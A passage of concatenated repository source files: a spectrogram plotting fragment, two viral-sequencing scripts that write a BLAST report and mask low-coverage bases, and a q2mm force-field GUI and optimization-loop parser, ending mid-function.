spectrogram = pre_emphasized_snd.to_spectrogram(window_length=0.03, maximum_frequency=8000)
plt.figure()
draw_spectrogram(spectrogram)
plt.twinx()
draw_pitch(pitch)
plt.xlim([snd.xmin, snd.xmax])
plt.show() # or plt.savefig("spectrogram_0.03.pdf")
create_spec_with_pitch(boyfile)
create_spec_with_pitch(girlfile)
create_spec_with_pitch(manfile)
create_spec_with_pitch(womanfile)
create_spec_with_pitch(highmanfile)
create_spec_with_pitch(highwomanfile)
```
|
{
"source": "JessvLS/project_spring_2020",
"score": 2
}
|
#### File: process_sample/rules/generate_report.py
```python
import os
from Bio import SeqIO
import collections
import sys
import argparse
import datetime
import subprocess
parser = argparse.ArgumentParser(description='Generate blast report.')
parser.add_argument("--consensus", action="store", type=str, dest="consensus")
parser.add_argument("--blast_db", action="store", type=str, dest="blast_db")
parser.add_argument("--detailed_blast_db", action="store", type=str, dest="detailed_blast_db")
parser.add_argument("--blast_file", action="store", type=str, dest="blast_file")
parser.add_argument("--detailed_blast_file", action="store", type=str, dest="detailed_blast_file")
parser.add_argument("--output_report", action="store", type=str, dest="output_report")
parser.add_argument("--output_seqs", action="store", type=str, dest="output_seqs")
parser.add_argument("--sample", action="store", type=str, dest="sample")
args = parser.parse_args()
def parse_blast_for_top_hit(blast_csv):
hits = []
with open(blast_csv, "r") as f:
for l in f:
tokens= l.rstrip('\n').split(',')
query = tokens[0]
hit = tokens[1]
score= tokens[-1]
hits.append((hit,score,l.rstrip('\n')))
top = sorted(hits, key = lambda x : float(x[1]), reverse = True)[0]
return(top[2].split(','))
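# Assumption, based on the unpacking below: each CSV row is a 12-column tabular
# BLAST hit (query, subject, %id, length, mismatches, gap opens, qstart, qend,
# sstart, send, e-value, bitscore), and the "top" hit is the row with the
# largest final column (bitscore).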
top_hit = parse_blast_for_top_hit(args.blast_file)
detailed_top_hit = parse_blast_for_top_hit(args.detailed_blast_file)
query,subject,pid,length,mismatch,gapopen,qstart,qend,sstart,send,evalue,bitscore= top_hit
query,subject_detailed,pid_detailed,length_detailed,mismatch_detailed,gapopen_detailed,qstart_detailed,qend_detailed,sstart_detailed,send_detailed,evalue_detailed,bitscore_detailed= detailed_top_hit
seq_dict={
"Sabin1_vacc":"GGGTTAGGTCAGATGCTTGAAAGCATGATTGACAACACAGTCCGTGAAACGGTGGGGGCGGCAACGTCTAGAGACGCTCTCCCAAACACTGAAGCCAGTGGACCAGCACACTCCAAGGAAATTCCGGCACTCACCGCAGTGGAAACTGGGGCCACAAATCCACTAGTCCCTTCTGATACAGTGCAAACCAGACATGTTGTACAACATAGGTCAAGGTCAGAGTCTAGCATAGAGTCTTTCTTCGCGCGGGGTGCATGCGTGGCCATTATAACCGTGGATAACTCAGCTTCCACCAAGAATAAGGATAAGCTATTTACAGTGTGGAAGATCACTTATAAAGATACTGTCCAGTTACGGAGGAAATTGGAGTTCTTCACCTATTCTAGATTTGATATGGAATTTACCTTTGTGGTTACTGCAAATTTCACTGAGACTAACAATGGGCATGCCTTAAATCAAGTGTACCAAATTATGTACGTACCACCAGGCGCTCCAGTGCCCGAGAAATGGGACGACTACACATGGCAAACCTCATCAAATCCATCAATCTTTTACACCTACGGAACAGCTCCAGCCCGGATCTCGGTACCGTATGTTGGTATTTCGAACGCCTATTCACACTTTTACGACGGTTTTTCCAAAGTACCACTGAAGGACCAGTCGGCAGCACTAGGTGACTCCCTCTATGGTGCAGCATCTCTAAATGACTTCGGTATTTTGGCTGTTAGAGTAGTCAATGATCACAACCCGACCAAGGTCACCTCCAAAATCAGAGTGTATCTAAAACCCAAACACATCAGAGTCTGGTGCCCGCGTCCACCGAGGGCAGTGGCGTACTACGGCCCTGGAGTGGATTACAAGGATGGTACGCTTACACCCCTCTCCACCAAGGATCTGACCACATAT",
"Sabin2_vacc":"GGAATTGGTGACATGATTGAGGGGGCCGTTGAAGGGATTACTAAAAATGCATTGGTTCCCCCGACTTCCACCAATAGCCTGCCTGACACAAAGCCGAGCGGTCCAGCCCACTCCAAGGAGATACCTGCATTGACAGCCGTGGAGACAGGGGCTACCAATCCGTTGGTGCCTTCGGACACCGTGCAAACGCGCCATGTCATCCAGAGACGAACGCGATCAGAGTCCACGGTTGAGTCATTCTTTGCAAGAGGGGCTTGCGTGGCTATCATTGAGGTGGACAATGATGCACCGACAAAGCGCGCCAGCAGATTGTTTTCGGTTTGGAAAATAACTTACAAAGATACTGTTCAACTGAGACGCAAACTGGAATTTTTCACATATTCGAGATTTGACATGGAGTTCACTTTTGTGGTCACCTCAAACTACATTGATGCAAATAACGGACATGCATTGAACCAAGTTTATCAGATAATGTATATACCACCCGGAGCACCTATCCCTGGTAAATGGAATGACTATACGTGGCAGACGTCCTCTAACCCGTCGGTGTTTTACACCTATGGGGCGCCCCCAGCAAGAATATCAGTGCCCTACGTGGGAATTGCTAATGCGTATTCCCACTTTTATGATGGGTTTGCAAAAGTACCACTAGCGGGTCAAGCCTCAACTGAAGGCGATTCGTTGTACGGTGCTGCCTCACTGAATGATTTTGGATCACTGGCTGTTCGCGTGGTAAATGATCACAACCCCACGCGGCTCACCTCCAAGATCAGAGTGTACATGAAGCCAAAGCATGTCAGAGTCTGGTGCCCACGACCTCCACGAGCAGTCCCATACTTCGGACCAGGTGTTGATTATAAAGATGGGCTCACCCCACTACCAGAAAAGGGATTAACGACTTAT",
"Sabin3_vacc":"ATTGAAGATTTGACTTCTGAAGTTGCACAGGGCGCCCTAACTTTGTCACTCCCGAAGCAACAGGATAGCTTACCTGATACTAAGGCCAGTGGCCCGGCGCATTCCAAGGAGGTACCTGCACTCACTGCAGTCGAGACTGGAGCCACCAATCCTCTGGCACCATCCGACACAGTTCAAACGCGCCACGTAGTCCAACGACGCAGCAGGTCAGAGTCCACAATAGAATCATTCTTCGCACGCGGGGCGTGCGTCGCTATTATTGAGGTGGACAATGAACAACCAACCACCCGGGCACAGAAACTATTTGCCATGTGGCGCATTACATACAAAGATACAGTGCAGTTGCGCCGTAAGTTGGAGTTTTTCACATACTCTCGTTTTGACATGGAATTCACCTTCGTGGTAACCGCCAACTTCACCAACGCTAATAATGGGCATGCACTCAACCAGGTGTACCAGATAATGTACATCCCCCCAGGGGCACCCACACCAAAGTCATGGGACGACTACACTTGGCAAACATCTTCCAACCCGTCCATATTTTACACCTATGGGGCTGCCCCGGCGCGAATCTCAGTGCCATACGTGGGGTTAGCCAATGCTTACTCGCACTTTTACGACGGCTTCGCCAAGGTGCCATTGAAGACAGATGCCAATGACCAGATTGGTGATTCCTTGTACAGCGCCATGACAGTTGATGACTTTGGTGTATTGGCAGTTCGTGTTGTCAATGATCACAACCCCACTAAAGTAACCTCCAAAGTCCGCATTTACATGAAACCCAAACACGTACGTGTCTGGTGCCCTAGACCGCCGCGCGCGGTACCTTATTATGGACCAGGGGTGGACTATAGGAACAACTTGGACCCCTTATCTGAGAAAGGTTTGACCACATAT"
}
for record in SeqIO.parse(args.blast_db,"fasta"):
if record.id==subject:
seq_dict[record.id]=record.seq
if subject!=subject_detailed:
for record in SeqIO.parse(args.detailed_blast_db,"fasta"):
if record.id==subject_detailed:
seq_dict[record.id]=record.seq
for record in SeqIO.parse(args.consensus,"fasta"):
seq_dict[record.id]=record.seq
fw= open(args.output_seqs,"w")
for i in seq_dict:
fw.write(">{}\n{}\n".format(i, seq_dict[i]))
fw.close()
fw=open(args.output_report,"w")
fw.write("## Report for sample: {}\n\n".format(args.sample))
now=datetime.datetime.now()
fw.write("{}/{}/{}\n\n".format(now.year,now.month,now.day))
fw.write("The type of virus that sample {} sequence is most similar to is {}.\n\n".format(args.sample, subject.split('_')[0]))
fw.write("Percentage ID: {}\n\nLength: {}\n\nNo. Mismatch: {}\n\nNo. Gap Opening: {}\n\nE-value: {}\n\n".format(pid,length,mismatch,gapopen,evalue))
fw.write("The closest hit in the detailed database to sample {} is {}.\n\n".format(args.sample, subject_detailed))
fw.write("Percentage ID: {}\n\nLength: {}\n\nNo. Mismatch: {}\n\nNo. Gap Opening: {}\n\nE-value: {}\n\n".format(pid_detailed,length_detailed,mismatch_detailed,gapopen_detailed,evalue_detailed))
fw.close()
```
#### File: process_sample/rules/mask_low_coverage.py
```python
import csv
import sys
import argparse
from Bio import SeqIO
def parse_args():
parser = argparse.ArgumentParser(description='Trim primers.')
parser.add_argument("--cns", action="store", type=str, dest="cns")
parser.add_argument("--paf", action="store", type=str, dest="paf")
parser.add_argument("--min_coverage", action="store", type=int, dest="min_coverage")
parser.add_argument("--masked_cns", action="store", type=str, dest="masked_cns")
return parser.parse_args()
def load_cns(cns):
for record in SeqIO.parse(str(cns), "fasta"):
my_record = record
return my_record, len(my_record)
"""
To estimate coverage, build a list of len(cns) counters, one per consensus
position, and increment a counter by one for every read mapped over that site.
Once you have that list, iterate over the bases in the cns file
and mask any base with coverage lower than min_coverage as N.
"""
def get_coverage(paf, cns_len):
coverage=[]
for i in range(cns_len):
coverage.append(0)
with open(paf, "r") as f:
for l in f:
l = l.rstrip("\n")
tokens = l.split("\t")
start,end = int(tokens[7]),int(tokens[8])
map_span = range(start, end) # PAF target start/end are 0-based and end-exclusive, so they map directly onto list indices
for i in map_span:
coverage[i]+=1
return coverage
def mask_bases(coverage_list, cns_seq, min_coverage):
masked_seq = ""
for coverage,base in zip(coverage_list, cns_seq):
if coverage >= min_coverage:
masked_seq += base
else:
masked_seq += 'N'
return masked_seq
if __name__ == '__main__':
args = parse_args()
cns, cns_len = load_cns(args.cns)
coverage = get_coverage(args.paf,cns_len)
masked_seq = mask_bases(coverage, cns.seq, args.min_coverage)
with open(str(args.masked_cns), "w") as fw:
fw.write(">{}\n{}\n".format(cns.description, masked_seq))
```
|
{
"source": "jesswahlers/q2mm",
"score": 3
}
|
#### File: q2mm/q2mm/gui.py
```python
from tkinter import *
from tkinter import messagebox, filedialog, Menu
import tkinter.ttk as ttk
#from tkinter.ttk import *
import os
import constants as co
#os.chdir(os.path.dirname(__file__))
class q2mm_gui():
def __init__(self):
self.anchor = W
self.cur_dir = os.getcwd()
self.path = ["","","","",""] # ff file, qparam.txt, init_comparison, final ff file, fin_comparison
self.weights = []
#co.WEIGHTS
self.qm_soft = [None,None,None,None,None,None,None]
self.mm_soft = [None,None,None,None,None,None,None]
self.open_f = None
self.save_f = None
self.commands = "DIR aa \nFFLD read bb \nWGHT cc \nPARM dd \nRDAT ee \nCDAT ff \nCOMP gg \nLOOP hh \nGRAD\nEND\nFFLD write ii \nCDAT\nCOMP jj "
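# Hedged illustration (not from the original source) of what the template above
# is meant to become once the aa-jj placeholders are filled in. The keywords
# mirror the commands parsed in loop.py; the file names here are made up:
#   DIR working_dir/
#   FFLD read mm3.fld
#   WGHT <weights from the spinboxes>
#   PARM qparam.txt
#   RDAT <calculate.py arguments for the reference data>
#   CDAT <calculate.py arguments for the FF data>
#   COMP init_comparison.txt
#   LOOP 0.01
#   GRAD
#   END
#   FFLD write mm3_final.fld
#   CDAT
#   COMP fin_comparison.txt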
# self.temp_commands = self.commands
self.font = "Helvetica 14 "
self.output = ""
self.FF = [("MM2",1),("MM3",2),("AMOEBA09",3)]
self.QM = [("B3LYP",1),("PBE",2)]
self.BAS = [("6-311G*",1),("6-31G",2)]
self.CAL = [("Energy",1),("Force",2),("Hessian",3)]
self.PRO = [("Gaussian",1),("PySCF",2)]
self.LOS = [("Original",1),("Energy",2)]
self.window()
def window(self):
win = Tk()
# win.option_add("*Dialog.msg.font","Helvetica")
self.menu(win)
win.grid_rowconfigure(1, weight=1)
win.grid_columnconfigure(0,weight=1)
frame1 = Frame(win,width=160, height=45,relief=RIDGE,bg="red")
frame1.grid(row=0,column=0)
frame2 = Frame(win,relief=FLAT,width=160, height=45,bg="cyan")
frame2.grid(row=2,column=0)
frame3 = Frame(win,relief=RIDGE,width=160, height=45,bg="white")
frame3.grid(row=0,column=1)
# self.content(win)
self.soft_frame(frame1)
self.file_frame(frame2)
self.weights_frame(frame3)
win.mainloop()
def menu(self,win):
menu = Menu(win)
win.config(menu=menu)
filemenu = Menu(menu)
# adding File menu
menu.add_cascade(label="File", menu=filemenu)
# options under Filemenu
filemenu.add_command(label="New", command=self.newfile)
filemenu.add_command(label="Open...", command= lambda inp = (("q2mm files","*.in"),("allfiles","*.*")): self.openfile(inp))
filemenu.add_separator()
filemenu.add_command(label="Exit", command=win.quit)
# Help menu
helpmenu = Menu(menu)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=self.about)
def file_frame(self,win):
return
def weights_frame(self,win):
cur_row = 0
cur_col = 0
weights = ["Weights"]
for val in co.WEIGHTS:
weights.append(val)
for r in weights:
Label(win,text=r, relief=FLAT,width=10).grid(row=cur_row,column=cur_col)
cur_row += 1
cur_row = 0
cur_col += 1
for val in co.WEIGHTS:
fv = StringVar()
fv.set(str(co.WEIGHTS[val]))
cur_row += 1
weight = Spinbox(win, from_=0, to=200, width=10, format="%10.2f", textvariable=fv)
weight.grid(row=cur_row, column=cur_col)
self.weights.append(weight)
def soft_frame(self,win):
col = 0
row = 0
col += 1
row += 1
cur_row = row
options = ["Method","Quantum Mechanics","Files","Molecular Mechanics","Files","Options"]
for r in options:
Label(win, text=r, relief=RIDGE, width=20).grid(row=cur_row, column=0)
cur_row += 1
options = ["Charge","Energy","Bond","Angle","Torsion","Hessian","EigenMatrix"]
var = []
checks = []
cur_row = row
cur_col = 1
for c in options:
# Label
temp_var = BooleanVar(0)
temp_check = Checkbutton(win, text=c, width=20, variable=temp_var)
temp_check.grid(row=cur_row, column=cur_col)
cur_col += 1
var.append(temp_var)
checks.append(temp_check)
# QUANTUM MECHANICS
cur_row = row+1
cur_col = 1
qm_options = ["Jaguar","Gaussian","Qchem"]
i = 0
checkboxs = []
for c in options:
cb = ttk.Combobox(win,values=qm_options)
self.qm_soft[i] = cb
#if var[i].get():
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
cur_col += 1
i += 1
checkboxs.append(cb)
# FILE CALL
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("Gaussian output files","*.log"),("all files","*.*")): self.openfile(inp))
qf.grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# MOLECULAR MECHANICS
row += 1
cur_row = row+1
cur_col = 1
mm_options = ["MacroModel","Tinker","Amber"]
i = 0
for c in options:
cb = ttk.Combobox(win,values=mm_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
self.mm_soft[i] = cb
cur_col += 1
i += 1
# File Call
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("all files","*.*")): self.openfile(inp)).grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# Option for Charge
row += 1
cur_row = row+1
cur_col = 1
charge_options = ["Partial charge","Partial charge(no H)","Partial charge sum"] # q,qh,qa
cb = ttk.Combobox(win,values=charge_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
# Option for Energy
cur_col += 1
energy_options = ["Pre-opt energy","Average energy","Post-opt energy"] # e,ea,eao
cb = ttk.Combobox(win,values=energy_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
return
def opt_frame(self,win):
return
def content(self,win):
commands = self.commands
col = 0
row = 0
cur_col = col
cur_row = row
Button(win, text="Working Directory", width=20, command = lambda inp=0: self.directory(inp)).grid(row=cur_row, column=cur_col)
# working directory (DIR) aa
row += 1
cur_col = col
cur_row = row
Button(win, text="Open force field file", command=lambda inp=(("Macromodel ff parameters","*.fld"),("Tinker ff parameters","*.prm"),("Amber ff parameters","*.*"),("all file","*.*")):self.openfile(inp,0),width=20).grid(row=cur_row, column=cur_col)
Button(win, text="Preview ff file", command=lambda inp=0: self.view_file(inp), width=20).grid(row=cur_row,column=cur_col+1)
# commands += "DIR "+path
# load forcefield file (FFLD read) bb
# commands += "\nFFLD read "+path
# load qparam file (PARM)
# reference
# calculation
col += 1
row += 1
cur_row = row
options = ["Method","Quantum Mechanics","Files","Molecular Mechanics","Files","Options"]
for r in options:
Label(win, text=r, relief=RIDGE, width=20).grid(row=cur_row, column=0)
cur_row += 1
options = ["Charge","Energy","Bond","Angle","Torsion","Hessian","EigenMatrix"]
var = []
checks = []
cur_row = row
cur_col = 1
for c in options:
# Label
temp_var = BooleanVar(0)
temp_check = Checkbutton(win, text=c, width=20, variable=temp_var)
temp_check.grid(row=cur_row, column=cur_col)
cur_col += 1
var.append(temp_var)
checks.append(temp_check)
# QUANTUM MECHANICS
cur_row = row+1
cur_col = 1
qm_options = ["Jaguar","Gaussian","Qchem"]
i = 0
checkboxs = []
for c in options:
cb = ttk.Combobox(win, values=qm_options)
self.qm_soft[i] = cb
#if var[i].get():
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
cur_col += 1
i += 1
checkboxs.append(cb)
# FILE CALL
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("Gaussian output files","*.log"),("all files","*.*")): self.openfile(inp))
qf.grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# MOLECULAR MECHANICS
row += 1
cur_row = row+1
cur_col = 1
mm_options = ["MacroModel","Tinker","Amber"]
i = 0
for c in options:
cb = ttk.Combobox(win, values=mm_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
self.mm_soft[i] = cb
cur_col += 1
i += 1
# File Call
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("all files","*.*")): self.openfile(inp)).grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# Option for Charge
row += 1
cur_row = row+1
cur_col = 1
charge_options = ["Partial charge","Partial charge(no H)","Partial charge sum"] # q,qh,qa
cb = ttk.Combobox(win, values=charge_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
# Option for Energy
cur_col += 1
energy_options = ["Pre-opt energy","Average energy","Post-opt energy"] # e,ea,eao
cb = ttk.Combobox(win, values=energy_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
# No Option for Bond, Angle, torsion
# Weights
self.weight_param(win,cur_row)
# bond_options = []
# eigenmatrix options for m changed by matching software
# Convergence (LOOP)
# name the final forcefield file(FFLD write)
# run
row = cur_row + 2
self.checks = checks
self.var = var
Button(win, text="Debug", command=self.debug).grid(row=row,column=0)
row += 1
Button(win, text="Preview Q2MM Input File", command=self.preview).grid(row=row,column=0)
row += 1
Button(win, text="Save", command=self.debug,width=20).grid(row=row,column=0)
Button(win, text="Run", command=self.debug,width=20).grid(row=row,column=1)
Button(win, text="Quit", command=win.quit,width=20).grid(row=row,column=2)
return
# DEBUG
def debug(self):
for i in self.var:
print(i.get())
# for i in self.qm_soft:
# print(i.get())
# for i in self.mm_soft:
# print(i.get())
for i in range(len(self.var)):
var = self.var[i].get()
print(i,var)
if var:
print(self.qm_soft[i].get())
print(self.mm_soft[i].get())
for i in self.weights:
print(i.get())
def view_file(self,n):
f = open(self.path[n],"r")
messagebox.showinfo("Preview",f.read())
#Text("1.0",f.read())
def weight_param(self,win,row):
cur_row = 0
cur_col = 9
weights = ["Weights"]
for val in co.WEIGHTS:
weights.append(val)
for r in weights:
Label(win, text=r, relief=FLAT, width=20).grid(row=cur_row, column=cur_col)
cur_row += 1
cur_row = 0
cur_col += 1
for val in co.WEIGHTS:
fv = StringVar()
fv.set(str(co.WEIGHTS[val]))
cur_row += 1
weight = Spinbox(win, from_=0, to=200, width=20, format="%10.2f", textvariable=fv)
weight.grid(row=cur_row, column=cur_col)
self.weights.append(weight)
return
def preview(self):
aa = "" #DIR
bb = "" #FFLD read
cc = "" #WGHT
dd = "" #PARM
ee = "" #RDAT
ff = "" #CDAT
gg = "" #COMP
hh = "" #LOOP
ii = "" #FFLD write
jj = "" #COMP
if self.var[0].get():
# read QM
# read MM
# read options
# read files loaded
# add lines to ee, ff
pass # placeholder: assemble the ee/ff lines from the selections once implemented
messagebox.showinfo("Q2MM Input File Preview", self.commands)
print("COMMANDS:")
# OS related functions
def directory(self,n):
self.cur_dir = filedialog.askdirectory(title="Select working directory")
def newfile(self):
print("Reset all variables")
def openfile(self, filetype, n=None):
path = filedialog.askopenfilename(initialdir=self.cur_dir, title="Select file",filetypes=filetype)
# n is optional so the menu and frame buttons that only pass a filetype still work
if n is not None:
self.path[n] = path
def openfiles(self, filetype):
paths = filedialog.askopenfilenames(initialdir=self.cur_dir, title="Select file",filetypes=filetype)
def about(self):
print("Q2MM is ")
q2mm_gui()
```
#### File: q2mm/q2mm/loop.py
```python
from __future__ import absolute_import
from __future__ import division
import argparse
import glob
import logging
import logging.config
import numpy as np
import os
import random
import sys
import re
import calculate
import compare
import constants as co
import datatypes
import gradient
import opt
import parameters
import simplex
logger = logging.getLogger(__name__)
class Loop(object):
def __init__(self):
self.convergence = 0.01
self.cycle_num = 0
self.direc = '.'
self.ff = None
self.ff_lines = None
self.args_ff = None
self.args_ref = None
self.loop_lines = None
self.ref_data = None
def opt_loop(self):
"""
Iterator for cycling through optimization methods.
Will continue to run the loop optimization methods until the convergence
criterion has been met.
Updates the user with logs on the optimization score changes. Backs up
the FF after each loop cycle.
"""
change = None
last_score = None
# This additional check ensures that the code won't crash if the user
# forgets to add a COMP command in the loop input file.
if self.ff.score is None:
logger.warning(
' -- No existing FF score! Please ensure use of COMP in the '
'input file! Calculating FF score automatically to compensate.')
self.ff.score = compare.compare_data(
self.ref_data, self.ff.data)
while last_score is None \
or change is None \
or change > self.convergence:
self.cycle_num += 1
last_score = self.ff.score
self.ff = self.run_loop_input(
self.loop_lines, score=self.ff.score)
logger.log(1, '>>> last_score: {}'.format(last_score))
logger.log(1, '>>> self.ff.score: {}'.format(self.ff.score))
change = (last_score - self.ff.score) / last_score
pretty_loop_summary(
self.cycle_num, self.ff.score, change)
# MM3* specific. Will have to be changed soon to allow for expansion
# into other FF software packages.
mm3_files = glob.glob(os.path.join(self.direc, 'mm3_???.fld'))
if mm3_files:
mm3_files.sort()
most_recent_mm3_file = mm3_files[-1]
most_recent_mm3_file = most_recent_mm3_file.split('/')[-1]
most_recent_num = most_recent_mm3_file[4:7]
num = int(most_recent_num) + 1
mm3_file = 'mm3_{:03d}.fld'.format(num)
else:
mm3_file = 'mm3_001.fld'
mm3_file = os.path.join(self.direc, mm3_file)
self.ff.export_ff(path=mm3_file)
logger.log(20, ' -- Wrote best FF to {}'.format(mm3_file))
for param in self.ff.params:
param.value_at_limits()
return self.ff
def run_loop_input(self, lines, score=None):
lines_iterator = iter(lines)
while True:
try:
line = next(lines_iterator)
except StopIteration:
return self.ff
cols = line.split()
if cols[0] == 'DIR':
self.direc = cols[1]
if cols[0] == 'FFLD':
# Import FF data.
if cols[1] == 'read':
if cols[2] == 'mm3.fld':
self.ff = datatypes.MM3(os.path.join(self.direc,
cols[2]))
if 'prm' in line:
self.ff = datatypes.TinkerFF(os.path.join(self.direc,
cols[2]))
if 'frcmod' in line:
self.ff = datatypes.AmberFF(os.path.join(self.direc,
cols[2]))
self.ff.import_ff()
self.ff.method = 'READ'
with open(os.path.join(self.direc, cols[2]), 'r') as f:
self.ff.lines = f.readlines()
# Export FF data.
if cols[1] == 'write':
self.ff.export_ff(os.path.join(self.direc, cols[2]))
# Trim parameters.
if cols[0] == 'PARM':
logger.log(20, '~~ SELECTING PARAMETERS ~~'.rjust(79, '~'))
self.ff.params = parameters.trim_params_by_file(
self.ff.params, os.path.join(self.direc, cols[1]))
if cols[0] == 'LOOP':
# Read lines that will be looped over.
inner_loop_lines = []
line = next(lines_iterator)
while line.split()[0] != 'END':
inner_loop_lines.append(line)
line = next(lines_iterator)
# Make loop object and populate attributes.
loop = Loop()
loop.convergence = float(cols[1])
loop.direc = self.direc
loop.ff = self.ff
loop.args_ff = self.args_ff
loop.args_ref = self.args_ref
loop.ref_data = self.ref_data
loop.loop_lines = inner_loop_lines
# Log commands.
pretty_loop_input(
inner_loop_lines, name='OPTIMIZATION LOOP',
score=self.ff.score)
# Run inner loop.
self.ff = loop.opt_loop()
# Note: Probably want to update this to append the directory given
# by the new DIR command.
if cols[0] == 'RDAT':
logger.log(
20, '~~ CALCULATING REFERENCE DATA ~~'.rjust(79, '~'))
if len(cols) > 1:
self.args_ref = ' '.join(cols[1:]).split()
self.ref_data = opt.return_ref_data(self.args_ref)
if cols[0] == 'CDAT':
logger.log(
20, '~~ CALCULATING FF DATA ~~'.rjust(79, '~'))
if len(cols) > 1:
self.args_ff = ' '.join(cols[1:]).split()
self.ff.data = calculate.main(self.args_ff)
if cols[0] == 'COMP':
# Deprecated
# self.ff.score = compare.compare_data(
# self.ref_data, self.ff.data)
# if '-o' in cols:
# compare.pretty_data_comp(
# self.ref_data,
# self.ff.data,
# os.path.join(self.direc, cols[cols.index('-o') + 1]))
# if '-p' in cols:
# compare.pretty_data_comp(
# self.ref_data,
# self.ff.data,
# doprint=True)
output = False
doprint = False
r_dict = compare.data_by_type(self.ref_data)
c_dict = compare.data_by_type(self.ff.data)
r_dict, c_dict = compare.trim_data(r_dict,c_dict)
if '-o' in cols:
output = os.path.join(self.direc, cols[cols.index('-o') +1])
if '-p' in cols:
doprint = True
self.ff.score = compare.compare_data(
r_dict, c_dict, output=output, doprint=doprint)
if cols[0] == 'GRAD':
grad = gradient.Gradient(
direc=self.direc,
ff=self.ff,
ff_lines=self.ff.lines,
args_ff=self.args_ff)
#### Should probably just write a function instead of looping
#### this for every gradient method. This includes everything
#### between the two lines of #. TR 20180112
##############################################################
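                # Each gradient option takes the form name=val1,val2,... where
                # the values toggle the method (True/False) or give radii,
                # cutoff, or factor lists written as [a/b/...].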
for col in cols[1:]:
if "lstsq" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_lstsq=True
                            elif arg == "False":
grad.do_lstsq=False
if 'radii' in arg:
grad.lstsq_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals == "None":
grad.lstsq_radii = None
else:
for val in radii_vals:
grad.lstsq_radii.append(float(val))
if 'cutoff' in arg:
grad.lstsq_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals == "None":
grad.lstsq_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.lstsq_cutoff.append(float(val))
elif "newton" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_newton=True
                            elif arg == "False":
grad.do_newton=False
if 'radii' in arg:
grad.newton_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.newton_radii = None
else:
for val in radii_vals:
grad.newton_radii.append(float(val))
if 'cutoff' in arg:
grad.newton_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.newton_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.newton_cutoff.append(float(val))
elif "levenberg" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_levenberg=True
                            elif arg == "False":
grad.do_levenberg=False
if 'radii' in arg:
grad.levenberg_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.levenberg_radii = None
else:
for val in radii_vals:
grad.levenberg_radii.append(float(val))
if 'cutoff' in arg:
grad.levenberg_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.levenberg_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.levenberg_cutoff.append(float(val))
if 'factor' in arg:
                                grad.levenberg_factor = []
factor_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if factor_vals=='None':
grad.levenberg_factor = None
else:
for val in factor_vals:
grad.levenberg_factor.append(float(val))
elif "lagrange" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_lagrange=True
                            elif arg == "False":
grad.do_lagrange=False
if 'radii' in arg:
grad.lagrange_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.lagrange_radii = None
else:
for val in radii_vals:
grad.lagrange_radii.append(float(val))
if 'cutoff' in arg:
grad.lagrange_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.lagrange_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.lagrange_cutoff.append(float(val))
if 'factor' in arg:
grad.lagrange_factors = []
factor_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if factor_vals=='None':
grad.lagrange_factors = None
else:
for val in factor_vals:
grad.lagrange_factors.append(float(val))
elif "svd" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_svd=True
                            elif arg == "False":
grad.do_svd=False
if 'radii' in arg:
grad.svd_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.svd_radii = None
else:
for val in radii_vals:
grad.svd_radii.append(float(val))
if 'cutoff' in arg:
grad.svd_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
